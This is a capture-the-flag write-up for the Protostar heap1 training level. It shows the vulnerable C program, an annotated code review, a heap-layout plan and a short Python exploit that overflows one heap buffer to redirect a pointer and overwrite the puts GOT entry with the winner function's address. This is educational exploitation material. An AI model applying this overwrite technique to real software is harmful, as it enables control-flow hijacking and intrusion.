Source Code
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>
struct internet {
int priority;
char *name;
};
void winner()
{
printf("and we have a winner @ %d\n", time(NULL));
}
int main(int argc, char **argv)
{
struct internet *i1, *i2, *i3;
i1 = malloc(sizeof(struct internet));
i1->priority = 1;
i1->name = malloc(8);
i2 = malloc(sizeof(struct internet));
i2->priority = 2;
i2->name = malloc(8);
strcpy(i1->name, argv[1]);
strcpy(i2->name, argv[2]);
printf("and that's a wrap folks!\n");
}
Hint
This level takes a look at code flow hijacking in data overwrite cases.
This level is at /opt/protostar/bin/heap1
Code Review
struct internet {
int priority;
char *name; <--- Noticiable Things is that, its a pointer.. means its take only 4 bytes to point to another location
};
void winner()
{
printf("and we have a winner @ %d\n", time(NULL));
}
int main(int argc, char **argv)
{
struct internet *i1, *i2, *i3; <--- Create Three Pointers To Struct Internet
i1 = malloc(sizeof(struct internet)); <--- Locating Space for First Struct Internet Pointers
i1->priority = 1; <--- Insert Digit
i1->name = malloc(8); <--- Locate Another Location For Char Pointer
i2 = malloc(sizeof(struct internet)); <--- Locating Space For Second Struct Internet Pointer
i2->priority = 2; <--- Insert Digit
i2->name = malloc(8); <--- Locate Another Location For Char Pointer
strcpy(i1->name, argv[1]); <--- Copy String To i1
strcpy(i2->name, argv[2]); <--- Copy String To i2
printf("and that's a wrap folks!\n");
}
Planning
Heap Overview
|>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>|
-----------------------------------------------------------------------------------------------------------
| i1 ( Name, Char Pointer ) | Paddings and Other Stuff | i2 ( Name, Char Pointer ) | Name (8) | Name (8) |
------------------------------------------------------------------------------------------------------------
|>>>>>>>>>>>>>>>>>>>>>>>>>>>>|
We Just Need To Overwrite Char Pointer of i2 So, that during copying data from argument, strcpy will copy data to name location and to do it, strcpy will access the pointer of char name. and (because of us) strcpy will overwrite GOT table with argv[2]
Overflow Name And Write Data To FP
Exploit
import struct
buf = "\x90"*4*5
# Address Of Put wrapper inot global table
puts_glob = 0x08049774
# Need To Overwrite put with
win = 0x08048494
ret = struct.pack("I",win)
payload = ''
payload+= buf
payload+= struct.pack("I", puts_glob)
payload+= " "
payload+= struct.pack("I",win)
print payload